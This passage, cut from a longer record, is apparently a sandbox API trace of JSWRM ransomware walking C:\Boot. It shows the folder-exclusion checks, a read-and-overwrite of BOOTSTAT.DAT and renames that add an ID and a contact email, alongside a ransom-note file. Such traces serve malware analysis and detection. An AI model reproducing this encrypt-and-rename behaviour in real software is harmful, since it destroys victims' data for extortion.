returned 1 [0063.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2370d8 | out: hHeap=0x1e0000) returned 1 [0063.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.643] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\bg-bg\\jswrm-decrypt.hta")) returned 0x20 [0063.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.643] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1c97a4fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName=".", cAlternateFileName="")) returned 0x232080 [0063.643] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.643] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1c97a4fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="..", cAlternateFileName="")) returned 1 [0063.643] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.644] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.644] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.644] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0063.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0063.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.644] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.645] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.645] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.645] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.645] CloseHandle (hObject=0xffffffff) returned 1 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0063.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225c30 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0063.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225c30 | out: hHeap=0x1e0000) returned 1 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.645] MoveFileW (lpExistingFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.645] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c97a4fc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1c97a4fc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1c97a4fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.646] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0063.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0063.646] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c97a4fc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1c97a4fc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1c97a4fc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0063.646] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.647] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2=".") returned 1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="..") returned 1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="...") returned 1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="windows") returned -1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="recovery") returned -1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="perflogs") returned -1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="documents and settings") returned -1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="$RECYCLE.BIN") returned 1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="system volume information") returned -1 [0063.647] lstrcmpiW (lpString1="bootspaces.dll", lpString2="msocache") returned -1 [0063.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootspaces.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0063.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootspaces.dll", cchWideChar=14, lpMultiByteStr=0x345f978, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootspaces.dll", lpUsedDefaultChar=0x0) returned 14 [0063.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootspaces.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0063.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootspaces.dll", cchWideChar=14, lpMultiByteStr=0x345f948, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootspaces.dll", lpUsedDefaultChar=0x0) returned 14 [0063.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0063.647] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2=".") returned 1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="..") returned 1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="...") returned 1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="windows") returned -1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="recovery") returned -1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="perflogs") returned -1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="documents and settings") returned -1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$RECYCLE.BIN") returned 1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="system volume information") returned -1 [0063.647] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="msocache") returned -1 [0063.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSTAT.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSTAT.DAT", cchWideChar=12, lpMultiByteStr=0x345f978, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTSTAT.DAT", lpUsedDefaultChar=0x0) returned 12 [0063.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSTAT.DAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSTAT.DAT", cchWideChar=12, lpMultiByteStr=0x345f948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTSTAT.DAT", lpUsedDefaultChar=0x0) returned 12 [0063.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.648] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.649] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=65536) returned 1 [0063.649] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10000) returned 0x2471a8 [0063.649] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x10000, lpOverlapped=0x0) returned 1 [0063.654] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.654] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x10000, lpOverlapped=0x0) returned 1 [0063.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.656] CloseHandle (hObject=0x450) returned 1 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0063.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232ce8 [0063.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0063.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0063.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.658] MoveFileW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\bootstat.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.659] HeapFree (in: hHeap=0x1e0000, 